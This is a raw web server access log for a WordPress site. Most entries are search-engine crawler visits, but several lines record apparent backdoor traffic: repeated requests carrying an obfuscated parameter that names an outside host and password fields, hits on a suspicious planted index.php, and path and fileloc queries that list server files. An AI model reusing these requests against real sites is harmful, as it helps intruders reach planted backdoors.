142.4.205.1 - - [17/Oct/2025:10:57:00 -0400] "GET /njABawTk/njABawTk/njABawTk/index.php?ARRAY=7o2230223n313736303731363632302p2231223n22687474703n5p2s5p2s7n7335393976313373752r636s7570706p652r6366645p2s3s6p633q7068705s636s64655s6n6326743q313736303731333032302q3431613466313466333363666466336263346434346131333033323035333339222p2232223n226532636665346139653937636530383933626234633932343232333362363764222p2233223n223731336661633265343537656430663232613737336362393365396137343664222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231372q34382q35312q36362q37312q38392q3231227q HTTP/1.0" 504 4358 "-" "-"
85.208.96.200 - - [17/Oct/2025:10:58:06 -0400] "GET /products/chapman804901?id=135 HTTP/1.0" 200 9227 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
85.208.96.203 - - [17/Oct/2025:10:58:09 -0400] "GET /products/marginellidae1800509?id=694 HTTP/1.0" 200 9227 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
114.119.152.60 - - [17/Oct/2025:10:58:13 -0400] "GET /author/auditwpmedia/?path=/var/www/vhosts/academiedumarketing.com/public_html/wp-content/plugins/filester/includes HTTP/1.0" 200 7359 "https://academiedumarketing.com/author/auditwpmedia/?path=/var/www/vhosts/academiedumarketing.com/public_html/wp-content/plugins/filester" "Mozilla/5.0 (Linux; Android 7.0;) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; PetalBot;+https://webmaster.petalsearch.com/site/petalbot)"
85.208.96.193 - - [17/Oct/2025:10:58:18 -0400] "GET /products/anticourt1184178?id=354 HTTP/1.0" 200 9227 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
142.4.205.1 - - [17/Oct/2025:10:57:20 -0400] "GET /njABawTk/njABawTk/njABawTk/index.php?ARRAY=7o2230223n313736303731363634302p2231223n22687474703n5p2s5p2s7n7335393976313373752r636s7570706p652r6366645p2s3s6p633q7068705s636s64655s6n6326743q313736303731333034302q3166643161376661613564353135343032383564313634396232646335666235222p2232223n226532636665346139653937636530383933626234633932343232333362363764222p2233223n223731336661633265343537656430663232613737336362393365396137343664222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231372q34382q35312q36362q37312q38392q3231227q HTTP/1.0" 504 4358 "-" "-"
185.191.171.19 - - [17/Oct/2025:10:58:26 -0400] "GET /products/asfetida1798074?id=281 HTTP/1.0" 200 9227 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
142.4.205.1 - - [17/Oct/2025:10:57:40 -0400] "GET /njABawTk/njABawTk/njABawTk/index.php?ARRAY=7o2230223n313736303731363636302p2231223n22687474703n5p2s5p2s7n7335393976313373752r636s7570706p652r6366645p2s3s6p633q7068705s636s64655s6n6326743q313736303731333036302q3839376363353431663430306134663138666166323136656530326239663030222p2232223n226532636665346139653937636530383933626234633932343232333362363764222p2233223n223731336661633265343537656430663232613737336362393365396137343664222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231372q34382q35312q36362q37312q38392q3231227q HTTP/1.0" 504 4358 "-" "-"
85.208.96.210 - - [17/Oct/2025:10:58:45 -0400] "GET /products/enlargingly1487653?id=818 HTTP/1.0" 200 9227 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
85.208.96.199 - - [17/Oct/2025:10:58:48 -0400] "GET /products/doter878460?id=416 HTTP/1.0" 200 9227 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
142.4.205.1 - - [17/Oct/2025:10:58:00 -0400] "GET /njABawTk/njABawTk/njABawTk/index.php?ARRAY=7o2230223n313736303731363638302p2231223n22687474703n5p2s5p2s7n7335393976313373752r636s7570706p652r6366645p2s3s6p633q7068705s636s64655s6n6326743q313736303731333038302q6234306263373637353065333462663032623738363339353333616364376335222p2232223n226532636665346139653937636530383933626234633932343232333362363764222p2233223n223731336661633265343537656430663232613737336362393365396137343664222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231372q34382q35312q36362q37312q38392q3231227q HTTP/1.0" 504 4358 "-" "-"
85.208.96.195 - - [17/Oct/2025:10:59:03 -0400] "GET /products/concerning1295241?id=404 HTTP/1.0" 200 9227 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
85.208.96.208 - - [17/Oct/2025:10:59:15 -0400] "GET /products/cymbaeform1178934?id=247 HTTP/1.0" 200 9227 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
142.4.205.1 - - [17/Oct/2025:10:58:20 -0400] "GET /njABawTk/njABawTk/njABawTk/index.php?ARRAY=7o2230223n313736303731363730302p2231223n22687474703n5p2s5p2s7n7335393976313373752r636s7570706p652r6366645p2s3s6p633q7068705s636s64655s6n6326743q313736303731333130302q6663346432613233373331646134363032313062616632613661343737643335222p2232223n226532636665346139653937636530383933626234633932343232333362363764222p2233223n223731336661633265343537656430663232613737336362393365396137343664222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231372q34382q35312q36362q37312q38392q3231227q HTTP/1.0" 504 4358 "-" "-"
85.208.96.195 - - [17/Oct/2025:10:59:25 -0400] "GET /products/deportment1185511?id=768 HTTP/1.0" 200 9227 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
85.208.96.202 - - [17/Oct/2025:10:59:34 -0400] "GET /products/irrecoverably994614?id=112 HTTP/1.0" 200 9227 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
142.4.205.1 - - [17/Oct/2025:10:58:40 -0400] "GET /njABawTk/njABawTk/njABawTk/index.php?ARRAY=7o2230223n313736303731363732302p2231223n22687474703n5p2s5p2s7n7335393976313373752r636s7570706p652r6366645p2s3s6p633q7068705s636s64655s6n6326743q313736303731333132302q6661623431643438653837326262366465353233303465613264333166313136222p2232223n226532636665346139653937636530383933626234633932343232333362363764222p2233223n223731336661633265343537656430663232613737336362393365396137343664222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231372q34382q35312q36362q37312q38392q3231227q HTTP/1.0" 504 4358 "-" "-"
114.119.138.172 - - [17/Oct/2025:10:59:40 -0400] "GET /2025/10/08/togel-digital-era-explained/?path=/var/www/vhosts/academiedumarketing.com/public_html/wp-includes/SimplePie/library/SimplePie/Content/cssjs HTTP/1.0" 200 7082 "https://academiedumarketing.com/2025/10/08/togel-digital-era-explained/?path=/var/www/vhosts/academiedumarketing.com/public_html/wp-includes/SimplePie/library/SimplePie/Content" "Mozilla/5.0 (Linux; Android 7.0;) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; PetalBot;+https://webmaster.petalsearch.com/site/petalbot)"
66.249.65.197 - - [17/Oct/2025:10:59:50 -0400] "GET /?_g=1293984 HTTP/1.0" 200 23892 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
142.4.205.1 - - [17/Oct/2025:10:59:00 -0400] "GET /njABawTk/njABawTk/njABawTk/index.php?ARRAY=7o2230223n313736303731363734302p2231223n22687474703n5p2s5p2s7n7335393976313373752r636s7570706p652r6366645p2s3s6p633q7068705s636s64655s6n6326743q313736303731333134302q3132323434616133346565343463313838396234613366626266663132663134222p2232223n226532636665346139653937636530383933626234633932343232333362363764222p2233223n223731336661633265343537656430663232613737336362393365396137343664222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231372q34382q35312q36362q37312q38392q3231227q HTTP/1.0" 504 4358 "-" "-"
142.4.205.1 - - [17/Oct/2025:10:59:20 -0400] "GET /njABawTk/njABawTk/njABawTk/index.php?ARRAY=7o2230223n313736303731363736302p2231223n22687474703n5p2s5p2s7n7335393976313373752r636s7570706p652r6366645p2s3s6p633q7068705s636s64655s6n6326743q313736303731333136302q3130613336303363393839336137366438363934313230623134663937396234222p2232223n226532636665346139653937636530383933626234633932343232333362363764222p2233223n223731336661633265343537656430663232613737336362393365396137343664222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231372q34382q35312q36362q37312q38392q3231227q HTTP/1.0" 504 4358 "-" "-"
185.191.171.14 - - [17/Oct/2025:11:00:29 -0400] "GET /products/distorted304721?id=734 HTTP/1.0" 200 9227 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
185.191.171.15 - - [17/Oct/2025:11:00:33 -0400] "GET /products/menispermine1949662?id=800 HTTP/1.0" 200 9227 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
85.208.96.196 - - [17/Oct/2025:11:00:39 -0400] "GET /products/capillitium1478190?id=987 HTTP/1.0" 200 9227 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
142.4.205.1 - - [17/Oct/2025:10:59:40 -0400] "GET /njABawTk/njABawTk/njABawTk/index.php?ARRAY=7o2230223n313736303731363738302p2231223n22687474703n5p2s5p2s7n7335393976313373752r636s7570706p652r6366645p2s3s6p633q7068705s636s64655s6n6326743q313736303731333138302q3865396437346261613166393564316261316463353836353236643539653166222p2232223n226532636665346139653937636530383933626234633932343232333362363764222p2233223n223731336661633265343537656430663232613737336362393365396137343664222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231372q34382q35312q36362q37312q38392q3231227q HTTP/1.0" 504 4358 "-" "-"
114.119.146.77 - - [17/Oct/2025:11:00:58 -0400] "GET /2025/10/08/togel-digital-era-explained/?path=/var/www/vhosts HTTP/1.0" 200 6681 "https://academiedumarketing.com/2025/10/08/togel-digital-era-explained/?path=/var/www/vhosts/academiedumarketing.com/public_html/wp-includes/js/tinymce/utils" "Mozilla/5.0 (Linux; Android 7.0;) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; PetalBot;+https://webmaster.petalsearch.com/site/petalbot)"
185.191.171.16 - - [17/Oct/2025:11:00:58 -0400] "GET /products/dreadless779930?id=378 HTTP/1.0" 200 9227 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
142.4.205.1 - - [17/Oct/2025:11:00:00 -0400] "GET /njABawTk/njABawTk/njABawTk/index.php?ARRAY=7o2230223n313736303731363830302p2231223n22687474703n5p2s5p2s7n7335393976313373752r636s7570706p652r6366645p2s3s6p633q7068705s636s64655s6n6326743q313736303731333230302q6432393266333864643164663961646436306662613630313837383935363834222p2232223n226532636665346139653937636530383933626234633932343232333362363764222p2233223n223731336661633265343537656430663232613737336362393365396137343664222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231372q34382q35312q36362q37312q38392q3231227q HTTP/1.0" 504 4358 "-" "-"
142.4.205.1 - - [17/Oct/2025:11:00:20 -0400] "GET /njABawTk/njABawTk/njABawTk/index.php?ARRAY=7o2230223n313736303731363832302p2231223n22687474703n5p2s5p2s7n7335393976313373752r636s7570706p652r6366645p2s3s6p633q7068705s636s64655s6n6326743q313736303731333232302q3236353932323334636263623633343161613463636631383365623366346361222p2232223n226532636665346139653937636530383933626234633932343232333362363764222p2233223n223731336661633265343537656430663232613737336362393365396137343664222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231372q34382q35312q36362q37312q38392q3231227q HTTP/1.0" 504 4358 "-" "-"
85.208.96.211 - - [17/Oct/2025:11:01:29 -0400] "GET /products/incremation1259918?id=272 HTTP/1.0" 200 9227 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
185.191.171.12 - - [17/Oct/2025:11:01:39 -0400] "GET /products/extranormal1141310?id=442 HTTP/1.0" 200 9227 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
142.4.205.1 - - [17/Oct/2025:11:00:40 -0400] "GET /njABawTk/njABawTk/njABawTk/index.php?ARRAY=7o2230223n313736303731363834302p2231223n22687474703n5p2s5p2s7n7335393976313373752r636s7570706p652r6366645p2s3s6p633q7068705s636s64655s6n6326743q313736303731333234302q6231336139336236306261313839336237393234653535356561643761366565222p2232223n226532636665346139653937636530383933626234633932343232333362363764222p2233223n223731336661633265343537656430663232613737336362393365396137343664222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231372q34382q35312q36362q37312q38392q3231227q HTTP/1.0" 504 4358 "-" "-"
185.191.171.15 - - [17/Oct/2025:11:01:44 -0400] "GET /products/munsee1579787?id=193 HTTP/1.0" 200 9227 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
142.4.205.1 - - [17/Oct/2025:11:01:00 -0400] "GET /njABawTk/njABawTk/njABawTk/index.php?ARRAY=7o2230223n313736303731363836302p2231223n22687474703n5p2s5p2s7n7335393976313373752r636s7570706p652r6366645p2s3s6p633q7068705s636s64655s6n6326743q313736303731333236302q3632343132346530636364656434376431386237303339373939623238623133222p2232223n226532636665346139653937636530383933626234633932343232333362363764222p2233223n223731336661633265343537656430663232613737336362393365396137343664222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231372q34382q35312q36362q37312q38392q3231227q HTTP/1.0" 504 4358 "-" "-"
85.208.96.212 - - [17/Oct/2025:11:02:01 -0400] "GET /products/convertibly814084?id=681 HTTP/1.0" 200 9227 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
85.208.96.204 - - [17/Oct/2025:11:02:05 -0400] "GET /products/gunner364080?id=751 HTTP/1.0" 200 9227 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
85.208.96.205 - - [17/Oct/2025:11:02:15 -0400] "GET /products/brachiolarian549662?id=42 HTTP/1.0" 200 9227 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
142.4.205.1 - - [17/Oct/2025:11:01:20 -0400] "GET /njABawTk/njABawTk/njABawTk/index.php?ARRAY=7o2230223n313736303731363838302p2231223n22687474703n5p2s5p2s7n7335393976313373752r636s7570706p652r6366645p2s3s6p633q7068705s636s64655s6n6326743q313736303731333238302q3030333366613737313439613533373164366330323430373731363661636237222p2232223n226532636665346139653937636530383933626234633932343232333362363764222p2233223n223731336661633265343537656430663232613737336362393365396137343664222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231372q34382q35312q36362q37312q38392q3231227q HTTP/1.0" 504 4358 "-" "-"
185.191.171.16 - - [17/Oct/2025:11:02:20 -0400] "GET /products/leucosoleniidae1437823?id=858 HTTP/1.0" 200 9227 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
114.119.146.77 - - [17/Oct/2025:11:02:23 -0400] "GET /category/uncategorized?path=/var/www/vhosts/academiedumarketing.com/public_html/wp-admin HTTP/1.0" 200 10462 "https://academiedumarketing.com/category/uncategorized" "Mozilla/5.0 (Linux; Android 7.0;) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; PetalBot;+https://webmaster.petalsearch.com/site/petalbot)"
85.208.96.196 - - [17/Oct/2025:11:02:29 -0400] "GET /products/nonsyllogizing1454880?id=380 HTTP/1.0" 200 9227 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
142.4.205.1 - - [17/Oct/2025:11:01:40 -0400] "GET /njABawTk/njABawTk/njABawTk/index.php?ARRAY=7o2230223n313736303731363930302p2231223n22687474703n5p2s5p2s7n7335393976313373752r636s7570706p652r6366645p2s3s6p633q7068705s636s64655s6n6326743q313736303731333330302q6136363034323331383139623536386532313237303136323131336662613465222p2232223n226532636665346139653937636530383933626234633932343232333362363764222p2233223n223731336661633265343537656430663232613737336362393365396137343664222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231372q34382q35312q36362q37312q38392q3231227q HTTP/1.0" 504 4358 "-" "-"
185.191.171.5 - - [17/Oct/2025:11:02:46 -0400] "GET /products/satanist1132887?id=637 HTTP/1.0" 200 9227 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
85.208.96.199 - - [17/Oct/2025:11:02:48 -0400] "GET /products/invent324475?id=212 HTTP/1.0" 200 9227 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
142.4.205.1 - - [17/Oct/2025:11:02:00 -0400] "GET /njABawTk/njABawTk/njABawTk/index.php?ARRAY=7o2230223n313736303731363932302p2231223n22687474703n5p2s5p2s7n7335393976313373752r636s7570706p652r6366645p2s3s6p633q7068705s636s64655s6n6326743q313736303731333332302q3061353966653261613235303230323765396161333430383562666261396635222p2232223n226532636665346139653937636530383933626234633932343232333362363764222p2233223n223731336661633265343537656430663232613737336362393365396137343664222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231372q34382q35312q36362q37312q38392q3231227q HTTP/1.0" 504 4358 "-" "-"
204.12.208.18 - - [17/Oct/2025:11:03:02 -0400] "GET /wp-includes/wpdc3def/index.php HTTP/1.0" 200 4154 "https://academiedumarketing.com/wp-includes/wpdc3def/index.php" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)"
85.208.96.200 - - [17/Oct/2025:11:03:03 -0400] "GET /products/benzenoid1404056?id=993 HTTP/1.0" 200 9227 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
85.208.96.206 - - [17/Oct/2025:11:03:06 -0400] "GET /products/bromcresol54658?id=828 HTTP/1.0" 200 9227 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
85.208.96.201 - - [17/Oct/2025:11:03:10 -0400] "GET /products/cytopathologic1319925?id=975 HTTP/1.0" 200 9227 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
142.4.205.1 - - [17/Oct/2025:11:02:20 -0400] "GET /njABawTk/njABawTk/njABawTk/index.php?ARRAY=7o2230223n313736303731363934302p2231223n22687474703n5p2s5p2s7n7335393976313373752r636s7570706p652r6366645p2s3s6p633q7068705s636s64655s6n6326743q313736303731333334302q6139343330373934343862653339303030656163616237343236396230663965222p2232223n226532636665346139653937636530383933626234633932343232333362363764222p2233223n223731336661633265343537656430663232613737336362393365396137343664222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231372q34382q35312q36362q37312q38392q3231227q HTTP/1.0" 504 4358 "-" "-"
216.73.216.189 - - [17/Oct/2025:11:03:26 -0400] "GET /robots.txt HTTP/1.0" 200 4352 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.189 - - [17/Oct/2025:11:03:26 -0400] "GET /category/uncategorized?path=%2Fvar%2Fwww%2Fvhosts%2Facademiedumarketing.com%2Fpublic_html%2Fwp-content%2Fthemes%2Ftwentynineteen%2Fsass%2Fforms HTTP/1.0" 200 7165 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
142.4.205.1 - - [17/Oct/2025:11:02:40 -0400] "GET /njABawTk/njABawTk/njABawTk/index.php?ARRAY=7o2230223n313736303731363936302p2231223n22687474703n5p2s5p2s7n7335393976313373752r636s7570706p652r6366645p2s3s6p633q7068705s636s64655s6n6326743q313736303731333336302q6231633037393264386331346663303663633532343562383835666561656530222p2232223n226532636665346139653937636530383933626234633932343232333362363764222p2233223n223731336661633265343537656430663232613737336362393365396137343664222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231372q34382q35312q36362q37312q38392q3231227q HTTP/1.0" 504 4358 "-" "-"
85.208.96.212 - - [17/Oct/2025:11:03:41 -0400] "GET /products/cottonocracy1764719?id=278 HTTP/1.0" 200 9232 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
204.12.208.18 - - [17/Oct/2025:11:02:42 -0400] "GET /wp-includes/wpdc3def/index.php HTTP/1.0" 504 4358 "https://academiedumarketing.com/wp-includes/wpdc3def/index.php" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506)"
114.119.136.5 - - [17/Oct/2025:11:03:46 -0400] "GET /author/auditwpmedia/?path=/var/www/vhosts/academiedumarketing.com/www/wp-includes/fonts HTTP/1.0" 200 7396 "https://academiedumarketing.com/author/auditwpmedia/?path=/var/www/vhosts/academiedumarketing.com/www/wp-includes" "Mozilla/5.0 (Linux; Android 7.0;) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; PetalBot;+https://webmaster.petalsearch.com/site/petalbot)"
142.4.205.1 - - [17/Oct/2025:11:03:00 -0400] "GET /njABawTk/njABawTk/njABawTk/index.php?ARRAY=7o2230223n313736303731363938302p2231223n22687474703n5p2s5p2s7n7335393976313373752r636s7570706p652r6366645p2s3s6p633q7068705s636s64655s6n6326743q313736303731333338302q6131316632353133393561646566376336336530353562623237363661353134222p2232223n226532636665346139653937636530383933626234633932343232333362363764222p2233223n223731336661633265343537656430663232613737336362393365396137343664222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231372q34382q35312q36362q37312q38392q3231227q HTTP/1.0" 504 4358 "-" "-"
85.208.96.206 - - [17/Oct/2025:11:04:03 -0400] "GET /products/antipatheticalness1613811?id=373 HTTP/1.0" 200 9227 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
142.4.205.1 - - [17/Oct/2025:11:03:20 -0400] "GET /njABawTk/njABawTk/njABawTk/index.php?ARRAY=7o2230223n313736303731373030302p2231223n22687474703n5p2s5p2s7n7335393976313373752r636s7570706p652r6366645p2s3s6p633q7068705s636s64655s6n6326743q313736303731333430302q6134316331366338626539303131383730363030316466323930663831386233222p2232223n226532636665346139653937636530383933626234633932343232333362363764222p2233223n223731336661633265343537656430663232613737336362393365396137343664222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231372q34382q35312q36362q37312q38392q3231227q HTTP/1.0" 504 4358 "-" "-"
85.208.96.205 - - [17/Oct/2025:11:04:30 -0400] "GET /products/disfrequent58272?id=149 HTTP/1.0" 200 9227 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
216.73.216.189 - - [17/Oct/2025:11:04:36 -0400] "GET /category/uncategorized?path=%2Fvar%2Fwww%2Fvhosts%2Facademiedumarketing.com%2Fpublic_html%2Fwp-content%2Fthemes%2Ftwentynineteen%2Fsass%2Flayout HTTP/1.0" 200 7076 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
142.4.205.1 - - [17/Oct/2025:11:03:40 -0400] "GET /njABawTk/njABawTk/njABawTk/index.php?ARRAY=7o2230223n313736303731373032302p2231223n22687474703n5p2s5p2s7n7335393976313373752r636s7570706p652r6366645p2s3s6p633q7068705s636s64655s6n6326743q313736303731333432302q6532326162666562353535306637336437613433353239343739306634316331222p2232223n226532636665346139653937636530383933626234633932343232333362363764222p2233223n223731336661633265343537656430663232613737336362393365396137343664222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231372q34382q35312q36362q37312q38392q3231227q HTTP/1.0" 504 4358 "-" "-"
43.130.139.136 - - [17/Oct/2025:11:04:52 -0400] "GET /?fileloc=/var/www/vhosts/academiedumarketing.com/public_html/wordfence-waf.php&path=/var/www/vhosts/academiedumarketing.com/public_html HTTP/1.0" 200 8103 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
185.191.171.18 - - [17/Oct/2025:11:04:52 -0400] "GET /products/kibitz897433?id=459 HTTP/1.0" 200 9227 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
142.4.205.1 - - [17/Oct/2025:11:04:00 -0400] "GET /njABawTk/njABawTk/njABawTk/index.php?ARRAY=7o2230223n313736303731373034302p2231223n22687474703n5p2s5p2s7n7335393976313373752r636s7570706p652r6366645p2s3s6p633q7068705s636s64655s6n6326743q313736303731333434302q3131663037623064303931343330343434613534396137643462376632393230222p2232223n226532636665346139653937636530383933626234633932343232333362363764222p2233223n223731336661633265343537656430663232613737336362393365396137343664222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231372q34382q35312q36362q37312q38392q3231227q HTTP/1.0" 504 4358 "-" "-"
185.191.171.18 - - [17/Oct/2025:11:05:01 -0400] "GET /products/edrioasteroidea1465911?id=790 HTTP/1.0" 200 9227 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
114.119.145.188 - - [17/Oct/2025:11:05:10 -0400] "GET /2025/10/08/togel-digital-era-explained/?path=/var/www/vhosts/academiedumarketing.com/public_html/wp-includes/SimplePie/library/SimplePie/Decode/HTML HTTP/1.0" 200 7090 "https://academiedumarketing.com/2025/10/08/togel-digital-era-explained/?path=/var/www/vhosts/academiedumarketing.com/public_html/wp-includes/SimplePie/library/SimplePie/Decode" "Mozilla/5.0 (Linux; Android 7.0;) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; PetalBot;+https://webmaster.petalsearch.com/site/petalbot)"
185.191.171.19 - - [17/Oct/2025:11:05:18 -0400] "GET /products/hesychast1086482?id=967 HTTP/1.0" 200 9227 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
142.4.205.1 - - [17/Oct/2025:11:04:20 -0400] "GET /njABawTk/njABawTk/njABawTk/index.php?ARRAY=7o2230223n313736303731373036302p2231223n22687474703n5p2s5p2s7n7335393976313373752r636s7570706p652r6366645p2s3s6p633q7068705s636s64655s6n6326743q313736303731333436302q3430333537653730333164396534356637363862313439643136346266643061222p2232223n226532636665346139653937636530383933626234633932343232333362363764222p2233223n223731336661633265343537656430663232613737336362393365396137343664222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231372q34382q35312q36362q37312q38392q3231227q HTTP/1.0" 504 4358 "-" "-"
185.191.171.11 - - [17/Oct/2025:11:05:31 -0400] "GET /products/airward542078?id=705 HTTP/1.0" 200 9227 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
85.208.96.205 - - [17/Oct/2025:11:05:33 -0400] "GET /products/hollywooder635252?id=112 HTTP/1.0" 200 9227 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
69.197.179.242 - - [17/Oct/2025:11:04:10 -0400] "GET /wp-includes/wpdc3def/index.php?id=511276 HTTP/1.0" 200 4087 "https://academiedumarketing.com/wp-includes/wpdc3def/index.php?id=511276" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3"
185.191.171.3 - - [17/Oct/2025:11:05:38 -0400] "GET /products/gritten1259410?id=261 HTTP/1.0" 200 9227 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
216.73.216.189 - - [17/Oct/2025:11:05:38 -0400] "GET /category/uncategorized?path=%2Fvar%2Fwww%2Fvhosts%2Facademiedumarketing.com%2Fpublic_html%2Fwp-content%2Fthemes%2Ftwentynineteen%2Fsass%2Fmodules HTTP/1.0" 200 7178 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
